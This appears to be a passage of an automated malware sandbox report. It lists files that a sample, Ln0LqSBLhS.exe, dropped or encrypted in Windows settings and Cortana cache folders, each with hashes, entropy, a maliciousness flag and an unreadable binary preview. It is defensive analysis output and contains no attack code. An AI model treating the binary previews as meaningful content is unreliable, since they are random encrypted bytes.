                                                                                                                                                                                                    SSDEEP:48:naEY3qEOK3UEAgLO7Ehwyfw2c3YbGsXnZxzuPeOzipxyFZ8/6ZvNJT80HPD:aEaqEzk9f7AwWwHYBX7zKP661807
                                                                                                                                                                                                    MD5:D2A1253BBE751D5B95E12A692A702000
                                                                                                                                                                                                    SHA1:B081C30C5740CC9DCBBB3A3D294991ABBBD61896
                                                                                                                                                                                                    SHA-256:34793D11089AA441D2EB56194AADA1FE0C2313B1629C9DA76815C8F84AE8A0DC
                                                                                                                                                                                                    SHA-512:7C166CD4B30C54CA4EE0632ED5D72C0D89A4C672D17A697AE732C457D41F0A70412ADDA2DE34938CE808917D7FA30A57DB427B290442F9841C3968226C3D3F32
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .......b6..b.l..r.<..y]....],?^.C,v.-.Zh........E.z.....b.I3g.....9.d.U...J. ...l.{..4.D1.]...3.8.ij..|t ..E..^4....M"d-...'9.i..k^.....Y7YXQM.A.......j.}...d..jC]........d@;I.......].~L.wb.V.&......k4..=6.+.".K....q6.K.C.OT.....b.v...q...o..h.Wj`.....s..=.....uw.2.>zE.W..L!.1..{...3..4...%.sx..*...H.[.:...^.v.J.O.).......+.z..$*tr..g...[...w-.=....E.O/iA.._...9...1..]e..Z......HY..-.....K.gC.'d_...4.....'v.z.&.C*.i..6.v..%...m......\.......S..iP:'6..].xa.1........$Y.Ye...&....`<.I..\>..y.....7...mtE-0.I,DC.-...<..R&x.....8uyQ7...%.....)..>..I).hI.].p...m..O......6P.Gtv...{.|.{. ....t...N..S.#...:d|.l..y..We..Q...h.L........_Ei@....8.b..1..X.$j....\zF..n{..%.p....M:t.Xr.2..^....g0...v.G.}.55Wh...#...b.B.....OB.8Qn.V.}g.K.#%.-.O...kW-e.2s.|..(,s-...sv.e].B.0......^.l.p....+......+.. .._...o.z..n.^.u.?..%\89..U..?.@.+...d..r_..Ij....w..B..0....\..T...Hu..'.l...YI.^;.*.o.....pxu2Yad,n(...y.O.......*....j...X..E`(G..]M+.2fk..P..D`..-
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):197266
                                                                                                                                                                                                    Entropy (8bit):7.999050275105391
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:6144:W9DkXs5TOcoogF0+Y2/RMFti13EQ6EOc0XcsmfSj:W9gXs5TOLogeGRMFtQ3V6EBsx
                                                                                                                                                                                                    MD5:44B4222B615AE395B1A10792002B7991
                                                                                                                                                                                                    SHA1:D66737900E0E2ED84A3947C2523E1401ECD661A1
                                                                                                                                                                                                    SHA-256:12D05060DAB78D8BF536267A67D10E2CDDB4ABB453755E54C12958FF22461668
                                                                                                                                                                                                    SHA-512:F4F7CD206B31F42A4F425025833589393E4C60DB8C0DF652F9624C7799DD6214DCE3B35E4F262364E562CBFEFE522FB6F2068A8E67997176BEB5021889DBB68E
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..GBlb.!v.G%...)}...?....@q.N.!#...........f.5h(..|.ux....=3.....VV.r...PvZ....6............?d?j4..qB9.'A..J....a..[.f.;.."8.....]..-n...f0T....I~O{.E. 5.. ...U......d ....6..Zr........<C.x.5.eU..r.....@...`\..k.+..I........).N.P....cZ....h.ZA...>L.o...[.<.(...m...^......m.)N$k.-....\s+.....bP..N..:.\.?.Lp......._3.!.e....:cdgh.d...i%..o..+9....-$..n.%.=.%:>z..h<..y.....:.7.{P...a......5.p.6.0.P.....6...H..G!.......H....T.a.E.A66...7E..n.m...O.?=....[.,.\...+ .L^..2..4...*..k.5B.B.pF.r}..?...Y..Ja2......o.{.~..5.i..?.f%....a.YQ.%.jD..HQ}......w......u.c..d..pL...T......,....O...g.o....=.yA.a...E...[...^j..s..c....._.i.sX...q..;3{.c.......7.P.K....G8X.\ .8..".t........MP..5......O0.NV...K.:eO.@..3..C............).......^...#.4b..E..o.J...#.......T.G{...p.t...<..QQK.ygF...H7.a...>.....}....h)..*.........<TSgU7Id6T.3...N.{0.JQ..B.....!2W...:%L>.@..KX0.bq..C..Dm...A..h.....^.,..0(..&^.(O.q.....ue.{.:6EQ.q..O.y..B..*.U.;H%...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):88722
                                                                                                                                                                                                    Entropy (8bit):7.998054064651053
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:+5gn4FsMrZ1pTfxU+mZFxjFejhyKoLBidyYuZNkeSLlUgiM9K5Opz4Pw9CmI:LnjMd1MlZwjM9BidyBZmBF/EpmI
                                                                                                                                                                                                    MD5:4558EE35294CED16E615D7038D01775E
                                                                                                                                                                                                    SHA1:C8B384549CD1AB5133B7FAFF49613C0E49371C0C
                                                                                                                                                                                                    SHA-256:BEEFDAC9C0F7FBBCC25FCD96FACE6B5E4F40E1523471801A50BB8F7721E8F25E
                                                                                                                                                                                                    SHA-512:CDFF3BDE96C8B6D6E626747D98DB685727FB6B2B7CDBB7F9E2A9924274AD4E73576D0C75254AFE7F95582ABC1BAB232AB35AB9B99092FDA008ED272EA65DF8A8
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ,7.D.F@.-.......@..$>..i.W...7d.FXb.HF._..t..`<~..".PNET..Jt.pYP..x.6.v.3n.J.1.Ja.I.7i..*.8.....Q.......x!-d...0l.8...$jj.$h......E6.....e.3b..dE.....w..y.[ .TdSY..O..........3...EM.p%H.H.g.Y&].*..v..].....)5v.o8..f.R....-.mGR>.....kH..{...!...V...]Z.......&`.....b)..7.7.........F...R....9<... $.i..#.^n.R.?!-..j....X...A.........q..w.#....A....s.8...!.f.Z..I....L...G.25b8......Vr......N....8..Z...,..$.V.r>.C....HP$J..=.....d....6......R...Q.N. .A..M.OKF2.#..7.U.<....4.r...2..v.$.@.D..........i..Y.]..[.L..lC.-..d.7(..........z@.j'.@@#0e3-5.%..q?..<j...x.f.|.7..hd.!Gx{D...\....l.y.!......&8..........vS....F...'W.b..).~.j..oy~...VP.@....a......#......./Ho.....N{.&........`t..~.z.X:}..I...D...z.iW....a..c..aYHpX.o#}..X;$.!....R%ws..$".^.....S^...C...Q7...ntPIbI.v.^N...'....E.l.........}.s.3.......Ym....S..)I..wbW..O.AI.^..%r.....H.....;..p6)3.+..u@..zS...:.F...m.L...{..L.3....Z_`...<......Fs........!.=m.d..h...':.0.7....{.D.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG2
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):37193
                                                                                                                                                                                                    Entropy (8bit):7.995174188925884
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:Wup5V94Hmc+coEat0+I5C64O4DSWjBTnk/x1JzknBnmnB/6+/:Wu/ViHovtX8OqaTQLknB9+/
                                                                                                                                                                                                    MD5:EF321C597A772419C1CF8EA0BC2EC10A
                                                                                                                                                                                                    SHA1:C29F84BBAE1E27A13359C3C8F02A283ED5B7D25C
                                                                                                                                                                                                    SHA-256:0ACD908F79007A93C8DEEF02CB86A8A024EDF5CD537C368F99E3CBB9C4EE4CAF
                                                                                                                                                                                                    SHA-512:AA6C07334483696753416B6ED01E934E7F7C86852FEE8F070B34A1F7067C77E38853989331A5BABD6FB8AAECB37D183C2A6FC5854418F6827063B11E296DF1DF
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..]%8........<.....`.%|W..Co^.z.....k>.?>0.........."....R.VS.N....B../..X...3.5...4&..N..)......qS4...9._...^.HhA.....J.".;.d.fes....{T.....%[......@.b{..i6.".).d.\.$K.<.....&....hq}o.>.q....9.J...]...a.G...YK.vD.[.......q..B...xM....7.r.P..E....Z..i...9...p./&....CK..*.8.JG7..C.C.S....qO.W.Q..hSN..[.F.....a..S.....?}pbUR'..=.^...J.....q..t....{.R......X..X..L..2..x..|9j`.I[.D....I..y/..}9..}.@..Fe".6&.Y.HG\....#.0+.w.1...~.+y..G....Py..n....W.....eZ.Y."#..(..h.9d..N......3..`Dg..[7..u.8...UP.Q..j.....c>7,.:'FB.r..[.R...tn$.....o;.t..Z."..BY[.....&.~..:.t. `'U%...........5.c.(..5wfH....}y.$i...o.k...hEs....L0....+...V.*.N....X*],..wY...#[.6..J!...t.+/...}g8....M.%b6.(..%.U.S.V.!{....|.S.....7,....1....%.................'..a.[!..(..F....;>..........c.V......[...|$.i..a._.\..5..Qp\`..|.E........}.?.L.4~"...;...[\..C...A....39.......X...;.n.4..k1..m$..Mk......t}..^._O..i7*...jM=.j.K...@\;.ux~..w.A8k.s.&p.!.^.B.vv2/Cc........
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):46327
                                                                                                                                                                                                    Entropy (8bit):7.995347321567869
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:gUWr1B+HyYY1afiNuN7+Zx7JyEkCFvRzVxDdeIftCQFvQIYZr/NRryR9t:gb1Bvh66IYvRzNeStNFIIa/q9t
                                                                                                                                                                                                    MD5:27EADB1A4FC5DF91A8BFAA89E06408D6
                                                                                                                                                                                                    SHA1:AAA7CDA711EEEDD469BEAFF3A2FECB410FEF05E2
                                                                                                                                                                                                    SHA-256:04C5EF5FC18CA83DD9A5860D26651BB9CD37B5CADFA2FB664AF2191740A4F80F
                                                                                                                                                                                                    SHA-512:0E11E446D3D9A33B80F2D7B84289BF23B44C45A06475AA0B532D55258950FA1724CBE382A35632FA204E63055F8A40DABEAC2D5AAC21C57CA2A37A6594510BA9
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..Y....t?U.g.............kV!...W....h..W.|?<0.K.W5.....-......V.&K@qFX._?.H.8...o..a-.sT5..^Q..P..x_U0.!.1j...f..i.>...)..O.a..k.u9..?~......w.#?...^w...s.Ve.1..3...:n...&....,(.&'.<.....&?...5..7....`......{......k.h..Z{....e$.....P.3.......Y.@.I..{b...Y.....l.@..<...4...<.pf5..UZ.3.NS...0...D...Q..b..V.k...z..=....#....1.h.3...y..(.....l1x..E.....2|.d..vp.u=.{..K..m..$...y.q..q{.05....h:h.8.....g}..R:V..F.1..O.R....+.{....9...5d.]..TM.&..L{....*.....i...R.ee......]5....q!.3.%-2]6qoad/%G?...:...[..U...*.t..5....c....r..O}}.Jd..f..$....9......U..x.1...........>..^...#...D.t...R..J".PL...... !..~.%.a.....$..3b.r.."...[."..G.....o_%.V....s.1.sm...p6.Y..n..<bb{_h4...)....+.nX.......J.f.M...m3~...TH'..D/<|.~...j...t.B*.7..VvIw........}.n/yL.....f...O88..nM...NS..Q.......%.........\n...s.W..'@!#..@v..,.tU...j..M..4.Y..TG'.q.l.-...bX......X;.C.....c.WlVT..._...D.....4M.v.._J..!.G..............?..L......dO....4..... \L.....GD#.......3.[Z.j.5.2H..w.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):137905
                                                                                                                                                                                                    Entropy (8bit):7.998648794393698
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:NLvJuTxnMo1+lIcH6MBNiwNH2+yHP93e8rFguD5anSJe6wh:Nyx/1O33b/HPyHP93e8KSonSf4
                                                                                                                                                                                                    MD5:C803DEF67FC23EF444378BB94921DCCF
                                                                                                                                                                                                    SHA1:A02B6D0DD71E9A4E5A3AD4189AFB9ADA600BBF96
                                                                                                                                                                                                    SHA-256:393F9A31EB7AABFF5BFD9881D992C6DBCA9B7A841FD327D899BFD86EB6453C92
                                                                                                                                                                                                    SHA-512:A064B37DA0642C38CB36003829E529C27635DD66E8E52CDC83E34EA291633810BD1E7DF78F341FF224421CA3735B3BFE8892D95C16486AC1A28D866699E398FC
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......Fo9...,C4..o.Ud1......)..M/a,.|.......pO.H;....&...L..P...|...F.L........[...G#.........,.....%bFB..........A...-......6. Z..Rj... ....`....G.=.O...gg...G.5.eM...H<26...r.......-'D.......Y.......I.H9.../.....Gm.ht.l..g..&T.........|z.~.).....6G..-..gU8.P=X....i.N.d...#T..^.w....#.f...~^..y.gE.r.2.....!.YI...z...J...J.9...{..$"G.........q...{.N.d.z..,3K,o....PR).....'....7..A.S.{94.~'.$.7.K.lv...7&1.a...=k.....6....1.2Q.x..:....i.U....W.JN.QQ.....i..-*.6..+..XSk..pQP..M....+C.b.]j.w#....p'.....Y.. .<..Wx.m.x.....'..w.<T.%kj.R..Y.b.6F.~.....Xv...0.<..5.........P.BE=xWTEw..IN.M.._q.V&.BZW..z.%.bu......G3....{-.gX.....0s.9.t..q`....v..........Y`......\...Z.U..S....C....7......q:...Cel..'.p....fG*~8.u6...4y..X....}..0.h...gC.T.......w.{|....dT.R.VwHp."...j...R[h.F...y,;y-..!..L@.....v.]..^..Q...<.........R4.jhb..ZN...V."Ij.zd.!..@..(..#..;.r..&.0f......j.K.~#.R'#.&......sZ@@.V....}Fr.VF.e.t........R........#.....'...Qh
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):35309
                                                                                                                                                                                                    Entropy (8bit):7.9946957721726335
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:YhlIBU0V7XCKjJ97r2ZeC2cLRghinVAF9xjQEeOaGeR1J64HaY1q2p7X+1Ju:Y50h77yZT2K2HxjQlEeR196Y1qI7X+1Q
                                                                                                                                                                                                    MD5:DDCFB916EB53F72AF81E2837A68D6856
                                                                                                                                                                                                    SHA1:D08177374FDE3D04062C35C50BFD92F1019DAD95
                                                                                                                                                                                                    SHA-256:156C7A686E4C3899A67D21B62797F228959DDDD198AF738E539837EB971D9A15
                                                                                                                                                                                                    SHA-512:B61371E2340FDBF30EF97381915299C83B57DDD14024DDE23EEC33DF849462397A15AB4181B493088641EAEB05CF520F38FC9F27F0D7A65B7CEA5F24044F7703
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: v3.Bt:..X..{...r2f.&..%.M#..k...N._..,..M...o%7|.-.l$C.=.M.o....l.@.jl..Z)s..n.......tS.Q...X.>............Y..............^,....?r?.....g])..-7h...x.k.@U:.R..k..I..6.2.D.j...v_.6@F:p......BK...r.V.p.Gb.../...Y.0..*#..D.}"q.|4...2.....!.M...P.f....[..{UgVG.(...6....D..<$'z.e..........9.:a..,..s.+..ae...*...]O..m........5.~...._.....-....a.o../vnl..?U*ui.`W..l.+~.,.'.C...u.......\.....-z...q...tw.^F.d d.A...g.....o.@H.)...X....c..o5[...k.GJO.z.2.....E..`..<..yk~~...A..tM.q.F.S..;.5..:;...c.{|....N..g..K&2......_.a.e....bi.....[..LJ!........2...{.c{......".o.).9<.....X..X7x.'.N.J..hI.7..DP..k..._.@).).R{>...iT.>5Wp.R-~...M....u.o...2..p#.+..x......Ph_.Q=s..z/'!_....6b....Mx.O..A..4...Z.)....@.}5....6.r6....V....T.....E.V.n|1...`..ir.90...O..TX....6...>..-...F.>....Z.....(V...PO.....b.X.dz..N~...9oq....@.A-.........3'..).:X..|7...$b..J.M'\...~K.Q..O........;.S.>..}.j..Q.....8.vB..H.K....L.M....4..J....H..i........(.-..............d..u
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):16274
                                                                                                                                                                                                    Entropy (8bit):7.987768900918072
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:OyvU458osPas/+yFaAu0tyEo29c4skCX5MvpEQZlzDebYH:GYxFCPFSeyO9c4s9X5MOQZlzKg
                                                                                                                                                                                                    MD5:1E7C3B7461314CD2940CD732D9C87D5D
                                                                                                                                                                                                    SHA1:19EC5C6B79A47040649B883CE432AC40897D54F1
                                                                                                                                                                                                    SHA-256:D1A4FC0644B2E27C8DA124F389C1A9BAB9D51471519372BBA8339C8508E41A6A
                                                                                                                                                                                                    SHA-512:289E3B4B8A9DB9647827F79557E3852AD3364C0526E9E887C3D4687C91E8411FD0E70788BF3DBCFD9F9D42E516558B5D1DFAF232E89775285BBBE77DC86D90EF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..A.U.{K.Es....v.1.=.n.....=.....h.{oJ.&%....p.Y....'...xM.m....5.._..^1...3..g.y*5^....jm......d.......+..C}.....k....E.6.~...qR.....0......BU........_.s.L.Y.W.I...u.....E.:....<...tVd...*.m......C....<.!.p.n.l.....%Q.<.........?....;W....<.V...xS...p.....y.....q..dO.S...k)......l...\.c.....).>T......~..;...F.S6.....%\..G...:4.dHS.....E."0.....~...v..R..(A;^...........6*..]o...-.f..4....m.v.TCb!f....l.. ... ../Q.~.O..`p..!;h~"..=q.....8%...T.'j.1. .Q.yDo..X...`U.8.gE.;...0k.....P9p.....pR..5.:..v60q._...(...IEA.?.g.g|...R...d.Z.8..cu..$&..fy7..D..n...x@.V.....cd..:..&d....:V....r..%...'.7....~....c[:.....;....R.lj}.+.....@.r...c.etVg.Ez...D.%I...U8.F>A.Srm....+.7..H~..tk....r0.........C....h.hn..............-....8..Gj29.Y..#.M....pP0=...Q.L..Ds9<.n./.x.0.+....>...Z.$. ..]u..8.........k..{.=.j......d...a.!..........%..v..s..G&\....S.y..]!.f.i..NL...7D..H...L>.!....{3.A.9.5...B/....}.F....n-.!.X.@.......Q.......{...U.....\c..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):39435
                                                                                                                                                                                                    Entropy (8bit):7.996396428302253
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:3pecMmEccU+bDniZZZ0qHvGszbBY82Cj8aD02U6J4oArgapPQKmrO2pi:3wNlFDniJFvJ5Y8D8annhaRQHaAi
                                                                                                                                                                                                    MD5:1F918BE95B9BA913B3B356B1E91B611E
                                                                                                                                                                                                    SHA1:168F6D72F80BE3D7FCD471109DE996CC7225A201
                                                                                                                                                                                                    SHA-256:DAA6807376E3D6EFB8640A982A6AA5C63EF98FC5F581924C6D73714642510FE9
                                                                                                                                                                                                    SHA-512:74A4AA0D22A094FAF618123F928E7AD3A8A0FDBC4760D8B779E2411BA0E6816D078803C5FE4DC81194991EC48C05074AB8DDFCFD227E919024B854DB759E1E3F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..'..SE.G.e6[.....B].e..>.q..l.x....N..C.D..z../M.x.{.n..$F}.(.O..(H.V.0.w8.O.....l~...n.|-.%:P.TT\.,.@] ~..*y]..w./@4..a...b....n~.!/x......B..>.N..B....Y.}.w9....S.......Gjm...j..=..Tb....4.[{..2....X.(...d:...9.$....W*c9...$><........ID.......<A....hCW...Y.......}.. .G....qWv.+(>.l?YX..a.....jf@........0...z.M...o&#...(.3.=U....p.....k*.J..J6r.E...=.vU..!.j.....!.x..A...\.B.-?\..WtM.-._......<......A....i.t.....`s...z..4.I.).F.B..UV....Y.BcI....Ox..-..9m.x....(&..J..X ...4Q..U.2|.<>..........t.TU..l.L.j..xxT..N...........y.....hC....+.(R..%..k.I.$./.#....$..A$.VjI.^..c.,..Hv.....`jm.n8..G.U.,.a...u.tG....$z...=&7.T.Ft.t..>.-}cO@.......{Or..8.SQ.F..c..;.q..........]J|..*..)...'..".N...../)t1.n...l&|0.o...-..:z.G\N.$.D0J.\....h..A...$e.j..?73N.V.#5J$...;.P5.C.....p..Z..$.;..RT....:).........B.;..e.|~..i.W.0.....r@....EL....`w%......}s..d."......s.O.v0.. .o..a[=R`3..[m8.....5...2.._m......p.Va.)..S...c.v.....Dy.F.|.q)....M.H95.X..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):7005
                                                                                                                                                                                                    Entropy (8bit):7.9713529499118785
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:hA2OXNR21+h8R6MqAbmJ/+9V/UEg5rGYt2J8f+p9qRDlB+VLQNSjp7dKc:hPw+K8R6NumR+3cbqKGp9qRv+ZXdKc
                                                                                                                                                                                                    MD5:7B92C3B92C22D6759172B4DDC12D14FE
                                                                                                                                                                                                    SHA1:B729C35888A5C0BC717D0BF85A806B7E5D6642D3
                                                                                                                                                                                                    SHA-256:F904887D3E9010949B4B12A93B0C8A88535CF6BABA30A8115AC2A41712D0331A
                                                                                                                                                                                                    SHA-512:781B98FE0B995272609407419800B26E26CF54A4E964E8C7F12636BABF74657BC1207478B3BC6E21B64C0611E6EE7DAC2FE9E2392FC777D008479B7D6787836A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: h.Ju......4.........n..]1..)....[..=..........]..g..;f....z...BQ.[8.]vb.#.m1..ey..q..vAK.f..j..C..$.G..]tY..R..q.F%v~p..G;t.Z........m[.zG'.......cG!..,$2..~u!...f}wV.....]...d.c............T..1.Ln.K..o..G.d...f.^...v|..P."N... .....7..PL.>.<..X7S6....U.c*..*.|....u.!.....".$..^S..S....>..._.%%.+.u.f..i.'K..4....>.e._.........Z.gs.o.d[A7..%.&.0..(..d.V..}.w ...g~..3..%.....z.1.t...5.|T%..#..........2t...P.3b......o....6.Jy.t.[|.R.i.S8..3|j....#...=...q.}L......R<..!...'.m...j...]d..tn...b...3A..W.T.oJCC........EU|.U.z....>..w./.H~.u....U.A2z.1...B.U..../..M.&....].\.E.1.9..-..4..g}..|.e6.^...t].......^z.W..).i.z....O....G....t..%..w...j..~A{*...3@....+. .b9.n_w....\R.'.bh..TX+.r.W#.c.?7n.... .o....O..M=.eP..g.5..[.0..}.H...RAT..wkV>.p.i.x...*|~..l...j.cS.\G.....z.I9.h.#..R..........).G;!NRQ^l4...<...-4Vj@[..;.8.O......)..M}.P>]R....':..O.....I.Nc.....F.....x$.: .l......kQ.i.-1...........H.!{...{..y....W.V.8...@.`|C.......\.?.~./F>.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6916
                                                                                                                                                                                                    Entropy (8bit):7.971641131215121
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:iJYo7tS18TmsxdZP5mIaeDuJDqgHK2yeM:iK71WXxLxKkUOog
                                                                                                                                                                                                    MD5:E3F2BEAF5E5726849D3A31E8B7C1CC38
                                                                                                                                                                                                    SHA1:AC9B72501161EC9D945E819FF5B70EC9C1C3BE74
                                                                                                                                                                                                    SHA-256:5C65AFA3A39E895B9C9D3B3A6F66503DA37DA7B41271A957CAF258057FF131E9
                                                                                                                                                                                                    SHA-512:FD73CE252008B7F9483A7A3C8F784FD65EE1B271BFBB23EEC3419867770005FFDEAE17951F8F9C00A7B869B21557E8B8AC52B5C1252E749EBA91E2796DED04BD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Dd.....l..<S..h....p).B..'../d)....N.IU.X....FIDT....U.)..l=.8.........r...5..h.`#...x.b...x.8L8F..3.........`.Dj1.....v.....%{w..y.\.=......m...C..o@.\.PR@I.....W..s.&{.m..FV.v...lH..}gJV.w.!qp..%D9.l%.JU.....37l.....T..v.i.:.......s..n.8........e.....0$..=....:.....(;A..O..<..L.:g9.7JT.z.J;........|...a...9U..X.S}.O.#i7....,...D.gqUq..).......@/......(...tlF.v...NCZgu.......l......eU.aO.._...j.r&...zj...}x_...*....!U.6...R.....g...rc..)..T<../.0I.....@...e(......1v.'...........W.NH?.w...W>{DV.[..Fm+Ye..K...1}...X:(.c.O....4n.....,.....c...~..Et.ngO...........Y.C.X...(...%.|v..L.^t....(~efI......Og....Ba..5..j..8l.j...{.#.l..?...*...}2.N8./......]jV.>.t.go&:"m.2. /.cc.4....XQ*.7.......C@m.8.!p|...u..c.l...[v.7:.0.exY........6/....N:...\S.6]......).xU.I.O..jpV++.3.FYS.Tw....u.~U.p....m.hH......=..k....^X.......L.c.%...<y}b.F.Os.^.p.'.-....6~j..|F......kD...7d.&....<...w_.Ho2..h z.t...O.I6.."...H.1..&.>Y%@(x...u....EPB........|N~...O.X.r..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):95152
                                                                                                                                                                                                    Entropy (8bit):7.998212720053078
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:3+Qe5rTqHjLS+351cczlKNQCjKLHZu5pUYI5na0DGA13kqpWPBHdSMU1bYObimJ/:3fegHPSQDhPZg5e0qY5a11GmKq
                                                                                                                                                                                                    MD5:786303C0DE647179295D6AC208317307
                                                                                                                                                                                                    SHA1:6F8A0877FBDC2F287C58C0E8F489F19F437F93F9
                                                                                                                                                                                                    SHA-256:FFB1CA605CEE02E559C928D1BDB21C32CBFA56EAA16DCD8BE1F2FB77E0D1A021
                                                                                                                                                                                                    SHA-512:CDDBDD918ED0517DA9026BB7058B13168220422828C3F2475CACD69FD19BF709D99B4500CA56D44D7842828030C09527F2149C1DF256A432E155CE2D3276DF6E
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
